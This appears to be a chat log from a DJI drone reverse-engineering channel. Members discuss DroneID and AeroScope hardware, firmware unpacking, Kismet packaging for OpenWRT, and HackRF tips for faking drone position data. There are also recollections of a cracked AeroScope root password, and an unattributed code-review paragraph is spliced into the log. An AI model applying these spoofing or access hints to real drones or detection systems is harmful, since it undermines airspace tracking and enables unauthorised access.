[2022-04-27 00:34:59]
wavesahead :
@proto ive done that already
[2022-04-27 00:35:29]
wavesahead :
requires proper calculation for bearing, etc. also can throw in pitch calculation
[2022-04-27 00:42:05]
wavesahead :
for elevation you mean altitude and barometric height? because without geodesics in the mix you cant fake the latter 100% accurately, but it is possible
[2022-04-27 05:08:13]
atlantic :
hackrf has a nasty dc spike when transmitting. consider upsampling to 19.2 Msps and then use an offset.
[2022-04-27 05:09:17]
atlantic :
you can use SRTM elevation data.
[2022-04-27 07:08:09]
wavesahead :
indeed, but that does lock you down to having online access or an offline copy and pre-configuring the flight information. i have come up with some tricks to get around either requirement.
[2022-04-27 07:47:19]
jan2642 :
https://github.com/miek/inspectrum
Since baudline was not working on my Mac (binary too old to be compatible) I looked for an alternative and found this.
[2022-04-27 23:42:53]
prz3mk0 :
prz3mk0 joined the channel.
[2022-04-28 01:50:19]
hostile :
https://www.whitehouse.gov/briefing-room/statements-releases/2022/04/25/fact-sheet-the-domestic-counter-unmanned-aircraft-systems-national-action-plan/
[2022-04-28 20:15:11]
hostile :
Thanks to those of you that helped @proto get armed up with information to make an assertive OccuSync public proof of concept to go alongside the existing ~enhancedwifi examples. https://www.theverge.com/2022/4/28/23046916/dji-aeroscope-signals-not-encrypted-drone-tracking
[2022-04-28 20:16:24]
hostile :
I know the current focus of DroneID as an application is Ukraine/Russia conflict. I'll maintain there are other privacy concerns in tow as well, they've been the same as 2017. It is good to get something proper on record, instead of propagation of bad info that DroneID was encrypted only for "good guys".
[2022-04-28 20:17:13]
hostile :
so thank you all for your continued discussion and help here. As usual we often wind up being the "source of truth" for DJI information. I'm glad that tradition is continuing.
[2022-04-28 20:18:35]
hostile :
[2022-04-28 20:19:07]
hostile :
This also puts some other claims to rest that I've been pushing for more "accurate" claims to be made on.
[2022-04-29 03:38:10]
quad808 :
Beautiful job @hostile and crew!!
[2022-04-29 13:25:57]
hostile :
ya all did the bulk of the leg work! Proving it on EnhancedWifi was easy. You all's historic Occusync notes and hints as you went along in private and chose to share here were invaluable.
[2022-04-30 16:31:16]
proto :
note for those of you that use my `process_file.m` script: i changed it to be a truly normalized cross correlation where the scores are between 0.0 and 1.0 so you shouldn't have to deal with guessing the threshold. but, this comes at the cost of runtime. it's something like 10-100x slower now which sucks, but at least the scores make sense now.
[2022-05-01 04:54:40]
hostile :
lol who did this?
[2022-05-01 04:54:57]
hostile :
https://twitter.com/CVEnew/status/1520142170753277952
[2022-05-01 04:55:30]
hostile :
https://nvd.nist.gov/vuln/detail/CVE-2022-29945
[2022-05-01 04:57:24]
hostile :
https://www.tenable.com/cve/CVE-2022-29945
[2022-05-01 04:57:40]
hostile :
who ever did is hilarious, cuz it propagated everywhere. https://vuldb.com/?id.198726
[2022-05-01 05:02:20]
hostile :
Anyone find any good OpenWRT devices for @~enhancedwifi ? I picked up two to play with tonight
[2022-05-01 05:02:28]
hostile :
https://openwrt.org/toh/tp-link/cpe510
[2022-05-01 05:02:36]
hostile :
https://openwrt.org/toh/tp-link/cpe210
[2022-05-01 05:03:01]
hostile :
they are the same router, just dedicated bands, one for 2.4 and one for 5.8 GHz
[2022-05-01 05:03:18]
hostile :
both should have ath9k
[2022-05-01 07:27:54]
jan2642 :
8 MB of flash, that’s tight. I’ve quickly tried grepping through the OpenWRT codebase to find a device which could support both bands with ath9k but so far haven’t found one.
[2022-05-01 12:03:25]
retina :
retina joined the channel.
[2022-05-01 13:53:05]
hostile :
it is indeed! still working on slimming the image down.
[2022-05-01 13:53:08]
hostile :
[2022-05-01 13:54:17]
hostile :
quick way to check is using the ath9k tag on their wiki.
[2022-05-01 13:54:18]
hostile :
https://openwrt.org/tag/ath9k?do=showtag&tag=ath9k
[2022-05-01 14:31:52]
hostile :
if I yank the kismet-tools there is room.
[2022-05-01 14:31:54]
hostile :
[2022-05-01 14:33:06]
hostile :
I wonder if I can edit ./package/network/kismet-openwrt/kismet-tools/Makefile to remove some more things I don't need in the tools. all the log_tools for example
[2022-05-01 17:56:53]
dragorn :
you don't need any of the tools
[2022-05-01 17:57:06]
dragorn :
you can run them all elsewhere and process your log file
[2022-05-01 17:57:16]
dragorn :
you don't need any of the capture drivers except wifi
[2022-05-01 17:57:36]
dragorn :
you don't need the ADSB ICAO db
[2022-05-01 17:57:42]
dragorn :
arguably you don't need the IEEE DB
[2022-05-01 17:57:58]
dragorn :
your other option is to run it all as remote cap and just shove packets to kismet running on linux/mac/WSL
[2022-05-01 17:58:32]
dragorn :
in which case all you need is `kismet-capture-linux-wifi`
[2022-05-01 18:02:19]
dragorn :
it looks like the ath10k firmware in openwrt isn't 5mhz capable
[2022-05-01 18:16:25]
hostile :
I wouldn't mind keeping the server UI, the kismet-tools seems to include it based on wording, but wasn't clear.
[2022-05-01 18:17:14]
hostile :
Was gonna see if this would do it
[2022-05-01 18:17:16]
hostile :
```$ git diff
diff --git a/openwrt/kismet-openwrt/kismet-tools/Makefile b/openwrt/kismet-openwrt/kismet-tools/Makefile
index 39bca0d..da50c96 100644
--- a/openwrt/kismet-openwrt/kismet-tools/Makefile
+++ b/openwrt/kismet-openwrt/kismet-tools/Makefile
@@ -43,28 +43,12 @@ CONFIGURE_VARS += \
define Build/Compile
$(MAKE) -C $(PKG_BUILD_DIR) \
LD="$(TARGET_CXX)" \
- tools/kismet_discovery \
- log_tools/kismetdb_clean \
- log_tools/kismetdb_dump_devices \
- log_tools/kismetdb_statistics \
- log_tools/kismetdb_strip_packets \
- log_tools/kismetdb_to_gpx \
- log_tools/kismetdb_to_kml \
- log_tools/kismetdb_to_pcap \
- log_tools/kismetdb_to_wiglecsv
+ tools/kismet_discovery
endef
define Package/kismet-tools/install
$(INSTALL_DIR) $(1)/usr/bin
$(INSTALL_BIN) $(PKG_BUILD_DIR)/tools/kismet_discovery $(1)/usr/bin/
- $(INSTALL_BIN) $(PKG_BUILD_DIR)/log_tools/kismetdb_clean $(1)/usr/bin/
- $(INSTALL_BIN) $(PKG_BUILD_DIR)/log_tools/kismetdb_dump_devices $(1)/usr/bin/
- $(INSTALL_BIN) $(PKG_BUILD_DIR)/log_tools/kismetdb_statistics $(1)/usr/bin/
- $(INSTALL_BIN) $(PKG_BUILD_DIR)/log_tools/kismetdb_strip_packets $(1)/usr/bin/
- $(INSTALL_BIN) $(PKG_BUILD_DIR)/log_tools/kismetdb_to_gpx $(1)/usr/bin/
- $(INSTALL_BIN) $(PKG_BUILD_DIR)/log_tools/kismetdb_to_kml $(1)/usr/bin/
- $(INSTALL_BIN) $(PKG_BUILD_DIR)/log_tools/kismetdb_to_pcap $(1)/usr/bin/
- $(INSTALL_BIN) $(PKG_BUILD_DIR)/log_tools/kismetdb_to_wiglecsv $(1)/usr/bin/
endef
```
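Review bot: the dependency and description lines of the kismet-tools package sit outside this hunk and are not adjusted, so any DEPENDS that existed only for the eight removed `log_tools/kismetdb_*` binaries will still be pulled into the 8 MB image; check them alongside this change. The hunk itself is internally consistent: each removed `Build/Compile` target has its matching `$(INSTALL_BIN)` line removed, `tools/kismet_discovery` is now the last target with no trailing backslash, and the `@@ -43,28 +43,12 @@` counts agree with the sixteen deleted lines. Since only `kismet_discovery` remains, not building kismet-tools at all would be simpler than carrying a local Makefile patch.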
[2022-05-01 18:17:34]
hostile :
I wasn't sure what kismet_discovery was
[2022-05-01 18:18:21]
hostile :
will report back later. got some fam stuff atm
[2022-05-01 18:22:15]
hostile :
are there any confirmed ath10k firmwares elsewhere that do 5mhz? could just make a package for openwrt using it eh?
[2022-05-01 21:15:38]
dragorn :
you can ignore all of kismet_tools; it's assorted utilities
[2022-05-01 21:15:53]
dragorn :
100% non-vital, 100% can be run on other systems to process logs elsewhere, etc
[2022-05-01 21:16:12]
dragorn :
kismet itself is going to be about 4.5-5 meg of binary, plus C++ libs
[2022-05-01 21:16:28]
dragorn :
just remote cap is going to be about 500kb or less
[2022-05-02 13:54:02]
dragorn :
the icao db is only for adsb; the manuf db is only for named manufacturers, so if you don't care, that'll save you some room too, and kismet won't care if they're not present. They're compressed data files, but still take some room
[2022-05-02 15:45:16]
skarzhevsky :
Does anyone have a picture of a mobile aeroscope, what is inside it?
[2022-05-02 16:02:20]
dkovar :
https://flymotionus.com/product/aeroscope-mobile/
[2022-05-02 20:31:25]
james0d0a :
james0d0a joined the channel.
[2022-05-03 14:30:16]
socializednerd :
socializednerd joined the channel.
[2022-05-04 12:37:08]
ostap :
[2022-05-04 12:48:22]
tmbinc :
From what I understand, it's basically "n" (8 or so?) LC1860 for OcuSync, n Wifi receivers, n Lightbridge modems.
[2022-05-04 12:48:58]
tmbinc :
All running an Aeroscope flavor. DDD has tp703 firmware
[2022-05-04 12:49:34]
hostile :
https://twitter.com/d0tslash/status/1191483305469890560?s=20&t=YjMxTAGn1sT7qyYGngyRRQ
[2022-05-04 12:51:21]
hostile :
@tmbinc yeah I've been wondering why no one has taken the aeroscope scanner firmware and a raw Occusync module and tried to make a RasPi utilize them for detections.
[2022-05-04 12:51:48]
hostile :
repurpose their own hardware just like they did for profit?
[2022-05-04 12:55:23]
tmbinc :
what device is this shell on? the embedded crystalsky thing?
[2022-05-04 13:24:15]
hostile :
TBH can't recall. Sounds about right though.
[2022-05-04 13:26:22]
hostile :
It is for here IIRC.
[2022-05-04 13:26:46]
hostile :
it has been so long I've forgotten all that shit. And long lost access to the Aeroscope I had in hand.
[2022-05-04 13:31:56]
hostile :
It was TI DM81xx based which you can see from the screenshot. Looks like they dragged some of the old DaVinci DM* tech they used in p3 & p4 series along into Aeroscope platform.
[2022-05-04 13:35:06]
hostile :
Kinda funny you can still see the DVR RDK remnants
[2022-05-04 13:41:42]
hostile :
[2022-05-04 13:44:24]
hostile :
The DM810X TI EVM doesn't seem to exist anywhere at this point in time. Probably EOL, and ran out of stock, obsolete, etc.
[2022-05-04 13:47:23]
hostile :
https://web.archive.org/web/20171228214041/http://www.ti.com/tool/dvrrd?DCMP=DSP_dvr&HQS=dvr
[2022-05-04 13:47:48]
hostile :
```
Texas Instruments offers low-cost, low-power, integrated multichannel reference designs featuring the Hybrid DVR (DVR/NVR) reference design based on the highly integrated TMS320DM816x and TMS320DM8107 DaVinci™ video processors. This single platform solution allows faster development at a reduced cost
```
[2022-05-04 13:48:06]
hostile :
[2022-05-04 13:51:22]
hostile :
I think the CrystalSky that was attached was a separate device that spoke to this one?
[2022-05-04 13:51:45]
hostile :
https://docs.djicdn.com/Products+info/ZS600C_V2597.zip
[2022-05-04 13:52:02]
hostile :
the firmware for it is here ^
[2022-05-04 15:14:07]
amh :
amh joined the channel.
[2022-05-04 16:53:34]
eseven :
If you ever lose it, the root password is in Aeroscope's Assistant Manual :joy:
[2022-05-04 17:50:54]
hostile :
at the time that hash was extracted & cracked there was no public manual, but that is hilarious they are like please, just FTP in as root. Lol
[2022-05-04 17:52:20]
konraditurbe :
Good stuff. https://twitter.com/GeeDawg55975157/status/1521419373990268928
[2022-05-04 17:56:46]
hostile :
good to see these tools proliferate. Everyone knows the commands have been used in private for a long time now. This will democratize the ability to do it quickly when in need. Good on those of you that helped ensure these tools were created. This is about the 3rd variant I have seen now.
[2022-05-04 17:58:33]
hostile :
Before validator mentioned here even... widely abused. https://dji-rev.com/dji-rev/pl/egxt1knyw3r68rawsfa5487nja
[2022-05-04 17:58:33]
hostile :
Before validator mentioned here even... widely abused. https://dji-rev.com/dji-rev/pl/rynocr6gs3bufmge8t6eicrq3o
[2022-05-05 05:04:15]
droneuser :
Any places outside the US (and besides aerial armor) where one can purchase, not rent, a DJI AeroScope?
[2022-05-05 13:18:37]
hostile :
scroll to bottom of page... fill out form. https://www.dji.com/aeroscope
[2022-05-05 13:18:53]
hostile :
```
Order DJI AeroScope Today
DJI AeroScope is available for order through authorized DJI Dealers. Contact us below for the team to reach out.
```
[2022-05-05 13:29:52]
hostile :
Randomly noticed that Brendan Schulman personally wrote that original response on Aeroscope when Mike, D13 and I published the paper with help from the OG's here.
[2022-05-05 13:29:57]
hostile :
https://static1.squarespace.com/static/589e20c9197aea0415f0e930/t/5a25969de2c4831af40e12e0/1512412829908/DJI+Response+to+D13.PDF
[2022-05-05 14:00:55]
stanlee :
[2022-05-05 14:01:03]
stanlee :
Hmmmm.....
[2022-05-05 14:07:14]
hostile :
another long forgotten oldie
[2022-05-05 14:07:18]
hostile :
[2022-05-05 14:07:28]
hostile :
"What's In a Name?" A Call for a Balanced Remote Identification Approach.
[2022-05-05 14:10:05]
hostile :
“No other technology is subject to mandatory industry-wide tracking and recording of its use, and we strongly urge against making UAS the first such technology. The case for such an Orwellian model has not been made" - DJI
[2022-05-05 14:10:42]
hostile :
God damn their own words are dank as fuck
[2022-05-05 14:10:57]
droneuser :
Someone has a gun to Brendan’s head I swear (https://www.washingtonpost.com/national-security/2022/02/01/china-funding-drones-dji-us-regulators/)
[2022-05-05 14:11:10]
hostile :
```
A networked solution also inherently raises the possibility that all UAS operations will be tracked and recorded for future unknown exploitation, including enforcement quotas or business espionage. A networked system is also susceptible to system-wide hacking, or the creation by detractors of false entries of drone operations that do not exist.
```
[2022-05-05 14:11:38]
hostile :
What a fucking 180 on presentation they did.
[2022-05-05 15:19:54]
hostile :
Slightly interesting list of folks that agreed with and those that did not agree with the proposal
[2022-05-05 15:19:54]
hostile :
https://www.faa.gov/regulations_policies/rulemaking/committees/documents/media/UAS%20ID%20ARC%20Final%20Report%20with%20Appendices.pdf
[2022-05-05 15:20:18]
hostile :
[2022-05-05 15:21:28]
hostile :
@faineg you'll like this comment
[2022-05-05 15:21:35]
hostile :
```
Under our legal system, the First Amendment autonomy for journalism takes precedence absent a government safety interest of the highest order. A system that requires all journalists using drones to file flight plans would, by definition, constitute the perpetual surveillance of journalists’ activities without a specific threat to safety. Such a system would be unconstitutional.
```
[2022-05-05 15:27:06]
hostile :
I'll also point out a few folks made fun of me for suggesting that packets be encrypted or signed, or SOME method of authorized reception occur. You may not know your history, but this sort of shit was proposed back in 2017 when the ruling was being sorted out. You can see the flow charts for this logic as presented by AriAscend in their UTM whitepaper.
[2022-05-05 15:28:35]
hostile :
note the clear difference in authorized vs unauthorized reception.
[2022-05-05 18:04:55]
dkovar :
Several entities have plans to crowdsource and collect RemoteID data, similar to the various ADSB data crowdsourcing companies.
[2022-05-05 20:19:32]
item1979 :
item1979 joined the channel.
[2022-05-06 02:25:36]
prz3mk0 :
this doesn't work anymore or does it? specifically, in regards to MA2
[2022-05-06 03:07:04]
hostile :
also re: encryption suggestions. This was from AUVSI. https://www.auvsi.org/sites/default/files/AUVSI%20Remote%20ID%20Comments%20Final.pdf
[2022-05-06 03:07:33]
hostile :
```
The FAA Should Recognize Clear Encryption and Tamper Resistance Standards as a Baseline for Compliance.
```
[2022-05-06 08:18:18]
jpaxel :
jpaxel joined the channel.
[2022-05-07 06:50:55]
hostile :
Real old shit off AWS showing the RealName lookup API.
[2022-05-07 06:53:25]
hostile :
[2022-05-07 06:54:35]
hostile :
[2022-05-07 06:55:39]
hostile :
[2022-05-07 07:01:48]
hostile :
This is the original DroneID message format. Looks like they do have a "signed" version planned already.
[2022-05-07 07:03:35]
hostile :
[2022-05-07 07:07:23]
hostile :
[2022-05-07 07:07:55]
hostile :
Note the dude here ready to jam / shoot shit down? lol
[2022-05-07 07:08:22]
hostile :
[2022-05-07 07:12:37]
hostile :
From this document.
[2022-05-07 07:13:41]
hostile :
```
Shenzhen Public Security Bureau Airport Branch
```
[2022-05-07 07:14:25]
hostile :
[2022-05-07 15:02:10]
enigma2 :
p
[2022-05-07 15:37:02]
gujaratgary :
gujaratgary joined the channel.
[2022-05-07 15:42:52]
gujaratgary :
madness
[2022-05-07 18:03:10]
melk :
melk joined the channel.
[2022-05-07 19:30:00]
dragorn :
So as far as I can tell from the wifi beacon tag droneid:
1 - the format originally in kismet that hostile and i did, and which was documented in the d13 paper, should be the IE 221 vendor (3 bytes), vendor subtype (1), 2 unknown bytes, report type (1), and if dji OUIs are a consistent length, 72 bytes, for a 79 byte tag payload.
2 - The "new" format, from the v2 python script discussed here, should be 221 vendor (3), subtype (1), unknown (2), report type (1), and 83 bytes of content.
3 - Devices like the spark and mavic air should be sending the legacy original packet since they never got a firmware update.
However:
Every pcap i have seen, including those from a mavic air and spark, are sending a 94 byte 221 IE tag for a flight record 0x10 droneid frame. I have *no* evidence of *any* system sending the original payload format, and nothing that properly matches the v2 "new" payload.
At this point I have no evidence *either* decode is correct, except for the GPS location at the beginning of the packet, and am strongly considering nuking all of it from kismet except the in-air reported location because I see nothing to prove any of the rest of it is consistent or correct, and I've never seen anything from a modern device, period
[2022-05-07 22:13:41]
hostile :
someone gonna have to pony up buy some old drones, start em off on that initial firmware version and work up.
[2022-05-07 22:14:44]
hostile :
thx for that verbose explanation of our shortcomings in getting you good data @dragorn. I really wish this place hummed along like it used to.
[2022-05-08 01:49:48]
ttmonster :
djmonster joined the channel.
[2022-05-08 21:02:56]
dragorn :
Not anybody's fault, just how it seems to be. and it's not that it's bad data, it's legit data, it just doesn't line up w/ my understanding of the collective understanding of the content.
[2022-05-08 21:04:23]
dragorn :
I'm just unfortunately the one lots of ppl not related to this channel come to b/c they want it in kismet, and then I get stressed that I have no good way to provide that. :) I've told ppl elsewhere what I'd need to get the rf cap proto worked on, for instance, into kismet; lacking a rf drone myself I'm not personally super interested in trying to do a port of the rf code to a generic-case click-and-go droneid dumper in kismet, b/c i have no way to test if my changes work
[2022-05-09 13:52:51]
hostile :
has anyone seen hints that Skydio has begun their own implementation of DroneID? Starting to get curious about how other vendors are testing things pre September's requirement. https://www.skydio.com/blog/understanding-faa-rule-on-remote-identification-drone/
[2022-05-09 13:56:38]
hostile :
They embed their "beacon" into the controller. https://fccid.io/2ATQRSMO5GV1/Internal-Photos/Internal-Photos-5302032.pdf
[2022-05-09 13:56:40]
hostile :
https://shop.skydio.com/products/skydio-2-plus-beacon
[2022-05-09 14:02:24]
eseven :
[2022-05-09 15:27:40]
hostile :
Parrot seems to already have some support for EU as well. https://www.parrot.com/us/newsroom/parrot-freeflight-6.7.4-update
[2022-05-09 15:28:33]
hostile :
[2022-05-09 15:40:41]
dragorn :
There's also 'opendroneid' tho i've seen some weird claims from them, and haven't seen a pcap
[2022-05-09 15:41:14]
dragorn :
Is parrot pure wifi? Happy to roll identifiers into kismet for it if we can get pcaps of whatever it sends. Going to assume it's an IE tag in the beacons, too
[2022-05-09 15:41:38]
dragorn :
b/c fun fact, a lot of sw can pull ie tags from beacons without monitor mode, or even root. `iw` scan results can dump raw beacon IE data, for instance
[2022-05-09 15:41:51]
dragorn :
I don't recall if there's a direct android API to get it yet, but it's definitely getable on other systems
[2022-05-09 15:44:18]
dragorn :
```dragorn@carbon-9 ~ % sudo iw dev wlp0s20f3 scan -u
...
Vendor specific: OUI 00:0c:43, data: 07 00 00 00
Vendor specific: OUI 00:0c:e7, data: 00 00 00 00 bf 0c b1 01 c0 33 2a ff 92 04 2a ff 92 04 c0 05 00 00 00 2a ff c3 03 01 02 02
Vendor specific: OUI 00:15:6d, data: 00 01 01 00 01 02 26 ec 81 06 e0 63 da 5a 28 91
```
[2022-05-09 19:42:59]
funnel :
funnel joined the channel.
[2022-05-10 02:00:59]
hostile :
I'll see what I can find out @dragorn the question about their implementation came from someone wondering what other vendors plan to do by the Sept enforcement window.
[2022-05-10 12:51:12]
mixeysan :
mixeysan joined the channel.
[2022-05-10 20:42:53]
deadnull :
deadnull joined the channel.
[2022-05-11 16:11:35]
tissy :
Please may I ask what board is in the 3D printed case?
[2022-05-11 16:18:35]
konraditurbe :
embedded board that sends DUML command
[2022-05-11 16:20:07]
tissy :
Do you know which board perhaps? RPi Pico?
[2022-05-11 19:38:10]
droneuser :
is there a capture (fc32 or raw file) available of an OcuSync drone ID burst?
[2022-05-11 19:38:42]
droneuser :
and how long does a droneID signal burst on the same frequency before hopping? mine doesn't seem to hop at all
[2022-05-11 22:49:16]
tmbinc :
https://twitter.com/tmbinc/status/1524521954287439872 FYI
[2022-05-11 22:51:43]
hostile :
Haven't seen inside in a long time!
[2022-05-11 22:52:16]
hostile :
Also may be useful to check behavior of the hot food cut off point in Dji Fly app for Aeroscope settings. https://mavicpilots.com/threads/aeroscope-removed-from-dji-fly-1-4-12.117404/
[2022-05-11 22:54:39]
tmbinc :
Is there no way anymore to edit the flight purpose or ID?
[2022-05-11 22:59:20]
hostile :
I believe that is correct.
[2022-05-11 22:59:32]
hostile :
I wanna say Dji Fly 1.4.8 was last version, but unclear.
[2022-05-12 01:58:44]
fredmicrowave :
Is the DJI Fly app of the RC pro different ? Because as i mentioned before, I do have this aeroscope option on 1.5.4
[2022-05-12 06:04:28]
atlantic :
Googling on AR9342 from the tweet of @tmbinc, i found this board. This is what you want, OpenWRT + dual band + Atheros AR9342. Document dated 2016, do not know if it is still available.
[2022-05-12 06:07:00]
atlantic :
https://compex.com.sg/shop/embedded-board/802-11n-embedded-board/wpj342-2/
[2022-05-12 06:17:00]
atlantic :
What is the function of the Leadcore on the smaller board with the uart and can connector?
[2022-05-12 06:35:00]
mgroberman :
mgroberman joined the channel.
[2022-05-12 09:25:51]
tmbinc :
@atlantic it connects to "BIST antenna" so likely test pattern generation?
[2022-05-12 14:35:07]
tmbinc :
Can Aeroscope detect non-DJI drones as well? "DJI's AeroScope is able to quickly identify the vast majority of popular drones on the market today " - ... does that imply that the "vast majority of popular drones" are DJI drones or that AeroScope can receive IDs from non-DJI drones? :thinking_face:
[2022-05-12 14:38:12]
hostile :
no
[2022-05-12 14:38:27]
hostile :
they are playing on their own market share in the wording
[2022-05-12 14:38:51]
hostile :
same shit our sales guys did at D13 that pissed me off 'we detect 90% of drones on market' riffing off DJI's claims to have 90% market share at that time.
[2022-05-12 14:40:30]
tmbinc :
lol
[2022-05-12 14:44:30]
tmbinc :
RF nerds - is the Aeroscope hardware in theory able to transmit?
[2022-05-12 14:45:06]
tmbinc :
The signal path appears to be very similar to a TX-enabled version (for example the BIST generator on the mainboard, or the path on a RC or UAV), but not sure if this applies up to the antenna
[2022-05-12 14:45:57]
tmbinc :
I understand there's currently no code that would do so, but I wonder if that was ever an intention, for example drone-supported forced RTH
[2022-05-12 14:47:51]
hostile :
absolutely able to tmbinc. Probably needs firmware flash for occusync, cuz we know it uses a "scanner" firmware. But shelled out on the linux subsystem I bet you could hit the wifi cards and transmit.
[2022-05-12 14:48:19]
hostile :
"for example drone-supported forced RTH" that is not trivial without some baked in backdoor encryption IMHO.
[2022-05-12 14:49:52]
tmbinc :
Yeah that would be the idea - have the drone receive a "signed magic packet" that would force RTH. (To be clear - I don't think this exists. I have not found anything like that in either FC firmware or S1 firmware. More thinking if that was ever an idea "to be implemented")
[2022-05-12 17:27:02]
hostile :
it would be implemented in china fwiw
[2022-05-12 17:27:11]
hostile :
and I'd seen wording to indicate as such
[2022-05-12 17:27:15]
hostile :
lemme find where I posted in past
[2022-05-12 17:28:12]
hostile :
I think it was part of UTMISS CAAC shit as I recall
[2022-05-12 17:29:27]
hostile :
Heh remember this agreement? https://www.faa.gov/aircraft/air_cert/international/bilateral_agreements/baa_basa_listing/media/China_BASA.pdf
[2022-05-12 17:30:28]
hostile :
here we go. https://twitter.com/d0tslash/status/1509555682047143940?s=20&t=u2HpX_jznJWtw07YjsUi0A
[2022-05-12 17:31:23]
hostile :
https://twitter.com/d0tslash/status/1509546323640467469
[2022-05-12 17:32:06]
hostile :
note how Government Authorities and Flight Control and Flight/Return / Landing and Flight Supervision all share a data connection.
[2022-05-12 17:32:10]
hostile :
[2022-05-12 17:32:41]
hostile :
[2022-05-12 17:32:57]
hostile :
"management commands from the government authorities, perform corresponding operations".
[2022-05-12 17:34:08]
hostile :
@tmbinc did you note the "signed" support packet spec I shared from the "Supervisor" folder in the AWS dump?
[2022-05-12 17:34:29]
hostile :
https://dji-rev.com/dji-rev/pl/p394sbeq1frs9ytmzfqkwpjkwy
[2022-05-12 18:21:37]
h_marshall :
h_marshall joined the channel.
[2022-05-12 19:08:22]
testuser00001 :
testuser00001 joined the channel.
[2022-05-12 19:55:17]
fredmicrowave :
There would need some RF power amplifier for practical transmitting. Could be an external two-way booster, but I can see several unpopulated connectors and maybe PA´s on the left of this photo...
[2022-05-12 20:25:36]
hostile :
those make more sense when you see the stationary unit. https://manuals.plus/dji/as-f1800-aeroscope-stationary-unit-manual.pdf
[2022-05-12 20:25:36]
hostile :
those make more sense when you see the stationary unit. https://dl.djicdn.com/downloads/AEROSCOPE/20201130/Aeroscope_AS-F1800_User_Manual_EN_JP_v2.0.pdf
[2022-05-12 20:25:48]
hostile :
[2022-05-12 20:26:05]
hostile :
[2022-05-12 20:27:45]
tmbinc :
The unpopulated headers are for the reverse RX module. I didn't open them up but you can see that the other parts are populated
[2022-05-12 20:28:11]
tmbinc :
so basically one has 4 antenna inputs, and then feeds through the signal (probably 2.4GHz and 5GHz separately) to the other board
[2022-05-12 21:51:04]
fredmicrowave :
Ok. I looked at the IC's patterns directly connected to the antennas and they have PCB heatsink pads, meaning they need to dissipate power, so I thought they may be amplifiers. Maybe just Gnd pads after all...
[2022-05-12 21:52:07]
fredmicrowave :
Or just arresters of protection stuff, for some of them at least.
[2022-05-13 14:47:21]
hostile :
Here is another account of AeroScope targeting of DJI gear. https://youtu.be/b166ecyNBCw?t=117
[2022-05-13 14:48:19]
hostile :
looks like he's holding some DJI gear in the footage.
[2022-05-13 15:30:19]
fredmicrowave :
I have found this one, different, and funny, in a way.... Can't imagine what goes in their head when they hear that noise...
There are also many videos of drones using analog video link and simple OSDs... They must be careful where the camera is pointing, or shut the camera off and activate RTH...
https://www.youtube.com/watch?v=XY6YjcUB_3I
[2022-05-13 17:57:41]
hostile :
FWIW the guy in the CNN video is https://twitter.com/brokenpixelua
[2022-05-13 21:00:55]
asdasdvoid :
asdasdvoid joined the channel.
[2022-05-14 00:22:39]
speatuk :
@fredmicrowave I would say it was a DJI FPV.
[2022-05-14 04:22:58]
hostile :
https://www.youtube.com/watch?v=wAnU-4JQPXQ
[2022-05-14 06:38:33]
enigma2 :
interesting part : dji can support all ocusync versions and chipsets(Lc1860/S1/P1) by only LC1860 .
And probably the future versions !
[2022-05-14 06:41:02]
enigma2 :
it's not fpga implemented that can be updated for future protocols accordingly . it's ASICs.
[2022-05-14 08:51:10]
tmbinc :
It's heavily DSP based
[2022-05-14 08:51:29]
tmbinc :
S1 I think is the only one not DSP-based (though I'm not exactly sure how it works there..)
[2022-05-14 09:46:41]
tissy :
Anyone able to advise on the MCU used for this portable option please?
[2022-05-14 11:34:11]
atlantic :
drone id did not change between ocusync version. only that extra all zeros symbol at the beginning, but you can ignore that.
[2022-05-14 23:00:28]
bri3d :
bri3d joined the channel.
[2022-05-15 00:10:42]
nmikus :
nmikus joined the channel.
[2022-05-15 18:08:44]
emeraldmaster :
emeraldmaster joined the channel.
[2022-05-15 18:10:13]
emeraldmaster :
jeep
[2022-05-15 21:31:30]
drj84 :
drj84 joined the channel.
[2022-05-15 22:44:28]
jjbyrnes29 :
jjbyrnes29 joined the channel.
[2022-05-16 03:27:07]
dronee :
dronee joined the channel.
[2022-05-16 06:16:51]
nmikus :
how do you enable logging on the s1?
[2022-05-16 06:59:58]
ninthbit :
ninthbit joined the channel.
[2022-05-16 10:26:57]
dronedog :
dronedog joined the channel.
[2022-05-16 17:18:55]
d3vl_jack :
d3vl_jack joined the channel.
[2022-05-16 21:22:17]
hostile :
For those of you that roughly said "DJi Enhanced Wifi should not be being used by either side". Surprise ~enhancedwifi is indeed on the ground. https://twitter.com/666_mancer/status/1525368232110088193
[2022-05-16 21:22:44]
hostile :
[2022-05-18 00:44:46]
faineg :
that video cracked me up a bit in that i've run basic drone training workshops that looked almost identical to this
[2022-05-18 00:45:01]
faineg :
i suppose "DJI 101" is fairly universal
[2022-05-19 11:20:54]
askeloduh :
askeloduh joined the channel.
[2022-05-20 16:28:38]
peteair :
hi all. following the steps of @tmbinc , I'd like to analyze the S1 chip firmware to see if there's more juicy information about the ocusync modulation (like the gold seq seed 0x0102.. found !).
[2022-05-20 16:28:40]
peteair :
So far, I've been able to:
- retrace your conversations and analysis about the RF HW used between Sparrow, Pigeon and co. My understanding is that only the S1 does everything "on-chip" rather than using an (encrypted) FPGA image like in the earlier version or the more recent IE1000 chip that I don't really understand
- find a firmware that seems to contain the S1 programming image : "V01.00.0108_Mavic_Air_2_RC_dji_system" (for the RC of the Mavic Air 2 aka wm231 that should use a S1)
- after having untarred and unencrypted firmware and module 1301, I find 2 un-encrypted (apart from the 2nd layer of IM*H encryption) binaries ap.img / cp.img => converted to ap_RTOS.bin and cp_RTOS.bin thanks to the IM*H script
- I'm pretty sure those "bin" are not encrypted cause the entropy is rather low and there are a lot of strings inside (not like another ap_RTOS / cp_RTOS I got from another more recent FW)
- from there, my understanding is that I should analyze those bins in IDA (or Ghidra that I prefer) and as it's flat images (like mentioned by a few people here before) use the entry point found in the IM*H header
[2022-05-20 16:29:22]
peteair :
I see a lot of decompiled functions in ghidra but I must admit I'm a bit lost after that
[2022-05-20 16:29:59]
peteair :
I don't expect you (especially @tmbinc ) to give all that intel for free but I would appreciate any hints or confirmation that I'm on the right track :-D
[2022-05-20 16:30:43]
tmbinc :
I think you're generally on the right track
[2022-05-20 16:30:50]
peteair :
I also got a "loader.img" file from the 1301 module, the "IM*H" part is a bit further away
[2022-05-20 16:31:10]
tmbinc :
make sure you understand the memory map, especially how CP and AP share data (there's some offset where each one can see into the other SRAM)
[2022-05-20 16:31:15]
peteair :
I don't know if I need to use that before to understand the ap / cp images or if the ap / cp image can be analyzed directly
[2022-05-20 16:31:27]
tmbinc :
No you can start right with AP+CP
[2022-05-20 16:31:33]
peteair :
hey ! thank you for your instant answer :-D
[2022-05-20 16:31:41]
peteair :
ok that's good to know thanks
[2022-05-20 16:32:01]
tmbinc :
